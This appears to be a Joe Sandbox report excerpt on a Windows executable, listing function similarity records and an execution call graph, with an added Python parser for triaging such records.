APIs
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
APIs
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                    • Instruction ID: 38bfaddd78ebfa15609d57c5b25731316e19069fbbcc02f41ba43bb0ae00e2d6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D11E921A0C58682F754AF6AE5452BAD263EB987A0FC44030DF8917F9ECDBDD491C338
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
• Instruction ID: 0ceaa519cdc4b31b14053640a7ae0d1c5edef379762368c9281ddd78c9de96e6
• Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
• Instruction Fuzzy Hash: 2D410612A08682C1FB60AF25A445379D692EB90BB8F944239EFDC16FD5DFBCD441CB20
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C26790B6
  • Part of subcall function 00007FF7C267A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9CE
  • Part of subcall function 00007FF7C267A9B8: GetLastError.KERNEL32(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9D8
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7C266CC15), ref: 00007FF7C26790D4
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\X9g8L63QGs.exe
• API String ID: 3580290477-4248481541
• Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
• Instruction ID: 491e795443bbf2011f6b9bd4d6362aefc3ab38454eb08626a6257a3be5a125c1
• Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
• Instruction Fuzzy Hash: E8417F32A09A42C5E754FF25A4400B8A3E6EB44BA4B954035E98E63F85DFBCE491C370
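The function records above follow one fixed layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), and a full report carries hundreds of them. When triaging such a dump it is easier to parse the records into structured objects than to read them by eye, for instance to list every function that directly calls GetModuleFileNameW or to find records whose Instruction Fuzzy Hash repeats. The parser below is an added example written for this page; it is not Joe Sandbox code and does not use any Joe Sandbox API. Its input is a constructed sample assembled from two records on this page (the subcall argument lists are shortened), and the consistency checks (Opcode ID equal to Opcode Fuzzy Hash, 64-hex-digit IDs, dump marked "based on PE: true") are the ones a reader can verify against the records themselves, not a documented Joe Sandbox invariant.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: two function records copied from the report above, in the line
# layout Joe Sandbox emits (section headers, "•" bullets, "Part of subcall" sub-bullets).
SAMPLE = """\
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C26790B6
  • Part of subcall function 00007FF7C267A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C2682D92), ref: 00007FF7C267A9CE
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7C266CC15), ref: 00007FF7C26790D4
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\\Users\\user\\Desktop\\X9g8L63QGs.exe
• API String ID: 3580290477-4248481541
• Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
• Instruction ID: 491e795443bbf2011f6b9bd4d6362aefc3ab38454eb08626a6257a3be5a125c1
• Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
• Instruction Fuzzy Hash: E8417F32A09A42C5E754FF25A4400B8A3E6EB44BA4B954035E98E63F85DFBCE491C370
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction ID: d846dfcdc70b74b2e437ac50950f86d31391642b2b8afa24462463046fdeb9cb
• Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction Fuzzy Hash: D041C772B18B8181DB20EF25F4443A9A761FB88BA4F954035EE8D97B94EF7CD441C760
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# "<api>.<module>(<args>), ref: <call site>"; the argument list is optional.
API_RE = re.compile(
    r"^(?P<name>\w+)\.(?P<module>[A-Z0-9_]+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)        # (api name, module, call site) of direct calls
    strings: list = field(default_factory=list)
    source: dict = field(default_factory=dict)      # Source File, Offset, based on PE, Associated
    similarity: dict = field(default_factory=dict)  # API ID, String ID, Opcode ID, fuzzy hashes, ...


def parse_records(text):
    """Split a Joe Sandbox function listing into FunctionRecord objects, one per 'APIs' header."""
    records, section = [], None
    for line in (ln.strip() for ln in text.splitlines()):
        if line in SECTIONS:
            if line == "APIs":              # every record starts with its APIs section
                records.append(FunctionRecord())
            section = line
            continue
        if not records or not line.startswith("•"):
            continue
        item = line[1:].strip()
        rec = records[-1]
        if section == "APIs":
            if item.startswith("Part of subcall function"):
                continue                    # indirect call: belongs to the callee, not this function
            m = API_RE.match(item)
            if m:
                rec.apis.append((m["name"], m["module"], m["ref"]))
        elif section == "Strings":
            rec.strings.append(item)
        elif section == "Memory Dump Source":
            if item.startswith("Associated:"):
                rec.source.setdefault("Associated", []).append(item.split(": ", 1)[1])
            else:                           # "Source File: X, Offset: Y, based on PE: true"
                for part in item.split(", "):
                    key, value = part.split(": ", 1)
                    rec.source[key] = value
        elif section == "Similarity":
            key, value = item.split(": ", 1) if ": " in item else (item.rstrip(":"), "")
            rec.similarity[key] = value     # an empty "String ID:" is kept as ""
    return records


def check_record(rec):
    """Sanity checks before trusting a record; returns a list of findings (empty means consistent)."""
    findings, sim = [], rec.similarity
    if sim.get("Opcode ID") != sim.get("Opcode Fuzzy Hash"):
        findings.append("Opcode ID and Opcode Fuzzy Hash disagree")
    for key in ("Opcode ID", "Instruction ID"):
        if not re.fullmatch(r"[0-9a-f]{64}", sim.get(key, "")):
            findings.append(f"{key} is not a 64-hex-digit value")
    if rec.source.get("based on PE") != "true":
        findings.append("dump is not marked 'based on PE: true'")
    return findings


def callers_of(records, api_name):
    """API IDs of every record that directly calls api_name."""
    return [r.similarity.get("API ID") for r in records if any(n == api_name for n, _, _ in r.apis)]


def duplicates_by_instruction_hash(records):
    """Records sharing an Instruction Fuzzy Hash, i.e. the same code reached from different sites."""
    groups = {}
    for r in records:
        groups.setdefault(r.similarity.get("Instruction Fuzzy Hash"), []).append(r.similarity.get("API ID"))
    return {h: ids for h, ids in groups.items() if len(ids) > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r.similarity["API ID"], r.apis, check_record(r) or "ok")
    print(callers_of(recs, "GetModuleFileNameW"))
```

Feed it the whole function section of a report (the records are separated only by their "APIs" headers) and the three helpers give the views a triager usually wants first: which functions touch a given API, whether any record is malformed, and which records are the same code under different API IDs.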
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction ID: d846dfcdc70b74b2e437ac50950f86d31391642b2b8afa24462463046fdeb9cb
• Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction Fuzzy Hash: D041C772B18B8181DB20EF25F4443A9A761FB88BA4F954035EE8D97B94EF7CD441C760
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
• Instruction ID: a000ec26833ea12dec27e375ca0018830e6a1e0d7b40ce0115051b4621239987
• Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
• Instruction Fuzzy Hash: 0A21B162A1868182EB20BF11E44466DA3B2FB84F54FE54035DACC63B94DFBCE945CB71
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
• Instruction ID: b3fb58a135ef8c04e6c2fd541d6bdb08b19f7ee3a4973e327c7f56b8e3f73abc
• Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
• Instruction Fuzzy Hash: 24115B32618B8182EB609F25F440269B7E2FB88BA4F984230DACD17B69DF7CD551CB10
APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                                                                                    • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                    • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                                    • Instruction ID: ef2d2fd69645b69c9cc40cdd2b04bc3d0f9aee12e8756f2a5d2b6db343cc2762
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B001716291C642C5F760BF60A46627EA3A1EF44B28FC00436D5CDA6B91EFBCE554CB34

Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 1.5%
Total number of Nodes: 1218
Total number of Limit Nodes: 102
_log10_special 8 API calls 102137 7ff7c2661c5e 102135->102137 102138 7ff7c26619cb 102136->102138 102137->101967 102137->101968 102181 7ff7c2661a03 102138->102181 102288 7ff7c2670744 102138->102288 102139 7ff7c26700bc 74 API calls 102139->102141 102141->102135 102142 7ff7c26619e5 102143 7ff7c2661a08 102142->102143 102144 7ff7c26619e9 102142->102144 102292 7ff7c267040c 102143->102292 102295 7ff7c2674f78 11 API calls _get_daylight 102144->102295 102147 7ff7c26619ee 102296 7ff7c2662910 54 API calls _log10_special 102147->102296 102150 7ff7c2661a26 102297 7ff7c2674f78 11 API calls _get_daylight 102150->102297 102151 7ff7c2661a45 102154 7ff7c2661a5c 102151->102154 102155 7ff7c2661a7b 102151->102155 102153 7ff7c2661a2b 102298 7ff7c2662910 54 API calls _log10_special 102153->102298 102299 7ff7c2674f78 11 API calls _get_daylight 102154->102299 102158 7ff7c2661c80 49 API calls 102155->102158 102160 7ff7c2661a92 102158->102160 102159 7ff7c2661a61 102300 7ff7c2662910 54 API calls _log10_special 102159->102300 102162 7ff7c2661c80 49 API calls 102160->102162 102163 7ff7c2661add 102162->102163 102164 7ff7c2670744 73 API calls 102163->102164 102165 7ff7c2661b01 102164->102165 102166 7ff7c2661b16 102165->102166 102167 7ff7c2661b35 102165->102167 102301 7ff7c2674f78 11 API calls _get_daylight 102166->102301 102168 7ff7c267040c _fread_nolock 53 API calls 102167->102168 102171 7ff7c2661b4a 102168->102171 102170 7ff7c2661b1b 102302 7ff7c2662910 54 API calls _log10_special 102170->102302 102173 7ff7c2661b50 102171->102173 102174 7ff7c2661b6f 102171->102174 102303 7ff7c2674f78 11 API calls _get_daylight 102173->102303 102305 7ff7c2670180 37 API calls 2 library calls 102174->102305 102177 7ff7c2661b55 102304 7ff7c2662910 54 API calls _log10_special 102177->102304 102178 7ff7c2661b89 102178->102181 102306 7ff7c2662710 54 API calls _log10_special 102178->102306 102181->102139 102183 7ff7c2668a2a 102182->102183 102184 7ff7c2669400 2 API calls 102183->102184 102185 7ff7c2668a49 
GetEnvironmentVariableW 102184->102185 102186 7ff7c2668a66 ExpandEnvironmentStringsW 102185->102186 102187 7ff7c2668ab2 102185->102187 102186->102187 102188 7ff7c2668a88 102186->102188 102189 7ff7c266c5c0 _log10_special 8 API calls 102187->102189 102336 7ff7c26694b0 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 102188->102336 102191 7ff7c2668ac4 102189->102191 102191->101978 102192 7ff7c2668a9a 102193 7ff7c266c5c0 _log10_special 8 API calls 102192->102193 102194 7ff7c2668aaa 102193->102194 102194->101978 102196 7ff7c2669422 MultiByteToWideChar 102195->102196 102197 7ff7c2669446 102195->102197 102196->102197 102199 7ff7c266945c __std_exception_copy 102196->102199 102198 7ff7c2669463 MultiByteToWideChar 102197->102198 102197->102199 102198->102199 102199->102036 102337 7ff7c2666350 102200->102337 102202 7ff7c2663399 102272 7ff7c2663670 FreeLibrary 102202->102272 102205 7ff7c2663381 102205->102202 102405 7ff7c2666040 102205->102405 102207 7ff7c266338d 102207->102202 102414 7ff7c26661d0 54 API calls 102207->102414 102210 7ff7c2661ca5 102209->102210 102553 7ff7c26749f4 102210->102553 102213->101985 102215 7ff7c26645bc 102214->102215 102216 7ff7c2669400 2 API calls 102215->102216 102217 7ff7c26645e4 102216->102217 102218 7ff7c2669400 2 API calls 102217->102218 102219 7ff7c26645f7 102218->102219 102576 7ff7c2676004 102219->102576 102222 7ff7c266c5c0 _log10_special 8 API calls 102223 7ff7c266392b 102222->102223 102223->101975 102224 7ff7c2667f80 102223->102224 102225 7ff7c2667fa4 102224->102225 102226 7ff7c2670744 73 API calls 102225->102226 102231 7ff7c266807b __std_exception_copy 102225->102231 102227 7ff7c2667fc0 102226->102227 102227->102231 102744 7ff7c2677938 102227->102744 102229 7ff7c2670744 73 API calls 102232 7ff7c2667fd5 102229->102232 102230 7ff7c267040c _fread_nolock 53 API calls 102230->102232 102231->101979 102232->102229 102232->102230 102232->102231 102234 7ff7c26700ec 102233->102234 102760 7ff7c266fe98 102234->102760 102236 7ff7c2670105 
102236->101975 102237->102043 102238->102043 102239->101989 102240->101992 102241->101997 102242->102000 102243->102017 102244->102043 102245->102018 102246->102043 102248 7ff7c266c5c9 102247->102248 102249 7ff7c2663ca7 102248->102249 102250 7ff7c266c950 IsProcessorFeaturePresent 102248->102250 102249->102096 102251 7ff7c266c968 102250->102251 102772 7ff7c266cb48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 102251->102772 102253 7ff7c266c97b 102773 7ff7c266c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 102253->102773 102256->102028 102257->102043 102258->102016 102260 7ff7c2661c80 49 API calls 102259->102260 102261 7ff7c2664650 102260->102261 102261->102037 102261->102261 102262->102069 102263->102073 102264->102076 102265->102080 102266->102088 102267->102082 102268->102087 102269->102087 102270->102050 102272->102063 102273->102068 102274->102109 102275->102109 102277 7ff7c26636bc GetModuleFileNameW 102276->102277 102277->102113 102277->102114 102279 7ff7c266932f FindClose 102278->102279 102280 7ff7c2669342 102278->102280 102279->102280 102281 7ff7c266c5c0 _log10_special 8 API calls 102280->102281 102282 7ff7c266371a 102281->102282 102282->102119 102282->102120 102283->102117 102284->102126 102285->102131 102286->102124 102287->102117 102289 7ff7c2670774 102288->102289 102307 7ff7c26704d4 102289->102307 102291 7ff7c267078d 102291->102142 102320 7ff7c267042c 102292->102320 102295->102147 102296->102181 102297->102153 102298->102181 102299->102159 102300->102181 102301->102170 102302->102181 102303->102177 102304->102181 102305->102178 102306->102181 102308 7ff7c267053e 102307->102308 102309 7ff7c26704fe 102307->102309 102308->102309 102310 7ff7c267054a 102308->102310 102319 7ff7c267a884 37 API calls 2 library calls 102309->102319 102318 7ff7c26754dc EnterCriticalSection 102310->102318 102313 7ff7c2670525 102313->102291 102314 7ff7c267054f 102315 7ff7c2670658 71 API calls 102314->102315 102316 7ff7c2670561 
102315->102316 102317 7ff7c26754e8 _fread_nolock LeaveCriticalSection 102316->102317 102317->102313 102319->102313 102321 7ff7c2661a20 102320->102321 102322 7ff7c2670456 102320->102322 102321->102150 102321->102151 102322->102321 102323 7ff7c2670465 __scrt_get_show_window_mode 102322->102323 102324 7ff7c26704a2 102322->102324 102334 7ff7c2674f78 11 API calls _get_daylight 102323->102334 102333 7ff7c26754dc EnterCriticalSection 102324->102333 102326 7ff7c26704aa 102328 7ff7c26701ac _fread_nolock 51 API calls 102326->102328 102330 7ff7c26704c1 102328->102330 102329 7ff7c267047a 102335 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102329->102335 102332 7ff7c26754e8 _fread_nolock LeaveCriticalSection 102330->102332 102332->102321 102334->102329 102335->102321 102336->102192 102338 7ff7c2666365 102337->102338 102339 7ff7c2661c80 49 API calls 102338->102339 102340 7ff7c26663a1 102339->102340 102341 7ff7c26663cd 102340->102341 102342 7ff7c26663aa 102340->102342 102344 7ff7c2664620 49 API calls 102341->102344 102425 7ff7c2662710 54 API calls _log10_special 102342->102425 102346 7ff7c26663e5 102344->102346 102345 7ff7c26663c3 102350 7ff7c266c5c0 _log10_special 8 API calls 102345->102350 102347 7ff7c2666403 102346->102347 102426 7ff7c2662710 54 API calls _log10_special 102346->102426 102415 7ff7c2664550 102347->102415 102352 7ff7c266336e 102350->102352 102352->102202 102368 7ff7c26664f0 102352->102368 102353 7ff7c266641b 102355 7ff7c2664620 49 API calls 102353->102355 102354 7ff7c2669070 3 API calls 102354->102353 102356 7ff7c2666434 102355->102356 102357 7ff7c2666459 102356->102357 102358 7ff7c2666439 102356->102358 102421 7ff7c2669070 102357->102421 102427 7ff7c2662710 54 API calls _log10_special 102358->102427 102361 7ff7c2666466 102362 7ff7c2666472 102361->102362 102363 7ff7c26664b1 102361->102363 102364 7ff7c2669400 2 API calls 102362->102364 102429 7ff7c2665820 137 API calls 102363->102429 102366 7ff7c266648a GetLastError 102364->102366 102428 7ff7c2662c50 51 API 
calls _log10_special 102366->102428 102430 7ff7c26653f0 102368->102430 102370 7ff7c2666516 102371 7ff7c266651e 102370->102371 102372 7ff7c266652f 102370->102372 102455 7ff7c2662710 54 API calls _log10_special 102371->102455 102437 7ff7c2664c80 102372->102437 102376 7ff7c266654c 102379 7ff7c266655c 102376->102379 102382 7ff7c266656d 102376->102382 102377 7ff7c266653b 102456 7ff7c2662710 54 API calls _log10_special 102377->102456 102457 7ff7c2662710 54 API calls _log10_special 102379->102457 102380 7ff7c266652a 102380->102205 102383 7ff7c266658c 102382->102383 102384 7ff7c266659d 102382->102384 102458 7ff7c2662710 54 API calls _log10_special 102383->102458 102386 7ff7c26665ac 102384->102386 102387 7ff7c26665bd 102384->102387 102459 7ff7c2662710 54 API calls _log10_special 102386->102459 102441 7ff7c2664d40 102387->102441 102391 7ff7c26665cc 102460 7ff7c2662710 54 API calls _log10_special 102391->102460 102393 7ff7c26665dd 102394 7ff7c26665ec 102393->102394 102395 7ff7c26665fd 102393->102395 102461 7ff7c2662710 54 API calls _log10_special 102394->102461 102397 7ff7c266660f 102395->102397 102399 7ff7c2666620 102395->102399 102462 7ff7c2662710 54 API calls _log10_special 102397->102462 102402 7ff7c266664a 102399->102402 102463 7ff7c2677320 73 API calls 102399->102463 102401 7ff7c2666638 102464 7ff7c2677320 73 API calls 102401->102464 102402->102380 102465 7ff7c2662710 54 API calls _log10_special 102402->102465 102406 7ff7c2666060 102405->102406 102407 7ff7c2666089 102406->102407 102413 7ff7c26660a0 __std_exception_copy 102406->102413 102497 7ff7c2662710 54 API calls _log10_special 102407->102497 102409 7ff7c2666095 102409->102207 102410 7ff7c26661ab 102410->102207 102412 7ff7c2662710 54 API calls 102412->102413 102413->102410 102413->102412 102467 7ff7c2661470 102413->102467 102414->102202 102416 7ff7c266455a 102415->102416 102417 7ff7c2669400 2 API calls 102416->102417 102418 7ff7c266457f 102417->102418 102419 7ff7c266c5c0 _log10_special 8 API calls 102418->102419 
102420 7ff7c26645a7 102419->102420 102420->102353 102420->102354 102422 7ff7c2669400 2 API calls 102421->102422 102423 7ff7c2669084 LoadLibraryExW 102422->102423 102424 7ff7c26690a3 __std_exception_copy 102423->102424 102424->102361 102425->102345 102426->102347 102427->102345 102428->102345 102429->102345 102432 7ff7c266541c 102430->102432 102431 7ff7c2665424 102431->102370 102432->102431 102435 7ff7c26655c4 102432->102435 102466 7ff7c2676b14 48 API calls 102432->102466 102433 7ff7c2665787 __std_exception_copy 102433->102370 102434 7ff7c26647c0 47 API calls 102434->102435 102435->102433 102435->102434 102438 7ff7c2664cb0 102437->102438 102439 7ff7c266c5c0 _log10_special 8 API calls 102438->102439 102440 7ff7c2664d1a 102439->102440 102440->102376 102440->102377 102442 7ff7c2664d55 102441->102442 102443 7ff7c2661c80 49 API calls 102442->102443 102444 7ff7c2664da1 102443->102444 102445 7ff7c2664e23 __std_exception_copy 102444->102445 102446 7ff7c2661c80 49 API calls 102444->102446 102447 7ff7c266c5c0 _log10_special 8 API calls 102445->102447 102448 7ff7c2664de0 102446->102448 102449 7ff7c2664e6e 102447->102449 102448->102445 102450 7ff7c2669400 2 API calls 102448->102450 102449->102391 102449->102393 102451 7ff7c2664df6 102450->102451 102452 7ff7c2669400 2 API calls 102451->102452 102453 7ff7c2664e0d 102452->102453 102454 7ff7c2669400 2 API calls 102453->102454 102454->102445 102455->102380 102456->102380 102457->102380 102458->102380 102459->102380 102460->102380 102461->102380 102462->102380 102463->102401 102464->102402 102465->102380 102466->102432 102468 7ff7c26645b0 108 API calls 102467->102468 102469 7ff7c2661493 102468->102469 102470 7ff7c26614bc 102469->102470 102471 7ff7c266149b 102469->102471 102473 7ff7c2670744 73 API calls 102470->102473 102520 7ff7c2662710 54 API calls _log10_special 102471->102520 102475 7ff7c26614d1 102473->102475 102474 7ff7c26614ab 102474->102413 102476 7ff7c26614f8 102475->102476 102477 7ff7c26614d5 102475->102477 102481 
7ff7c2661508 102476->102481 102482 7ff7c2661532 102476->102482 102521 7ff7c2674f78 11 API calls _get_daylight 102477->102521 102479 7ff7c26614da 102522 7ff7c2662910 54 API calls _log10_special 102479->102522 102523 7ff7c2674f78 11 API calls _get_daylight 102481->102523 102484 7ff7c2661538 102482->102484 102487 7ff7c266154b 102482->102487 102498 7ff7c2661210 102484->102498 102485 7ff7c2661510 102524 7ff7c2662910 54 API calls _log10_special 102485->102524 102490 7ff7c267040c _fread_nolock 53 API calls 102487->102490 102491 7ff7c26614f3 __std_exception_copy 102487->102491 102493 7ff7c26615d6 102487->102493 102489 7ff7c26700bc 74 API calls 102492 7ff7c26615c4 102489->102492 102490->102487 102491->102489 102492->102413 102525 7ff7c2674f78 11 API calls _get_daylight 102493->102525 102495 7ff7c26615db 102526 7ff7c2662910 54 API calls _log10_special 102495->102526 102497->102409 102499 7ff7c2661268 102498->102499 102500 7ff7c2661297 102499->102500 102501 7ff7c266126f 102499->102501 102504 7ff7c26612d4 102500->102504 102505 7ff7c26612b1 102500->102505 102531 7ff7c2662710 54 API calls _log10_special 102501->102531 102503 7ff7c2661282 102503->102491 102508 7ff7c26612e6 102504->102508 102518 7ff7c2661309 memcpy_s 102504->102518 102532 7ff7c2674f78 11 API calls _get_daylight 102505->102532 102507 7ff7c26612b6 102533 7ff7c2662910 54 API calls _log10_special 102507->102533 102534 7ff7c2674f78 11 API calls _get_daylight 102508->102534 102511 7ff7c26612eb 102535 7ff7c2662910 54 API calls _log10_special 102511->102535 102512 7ff7c267040c 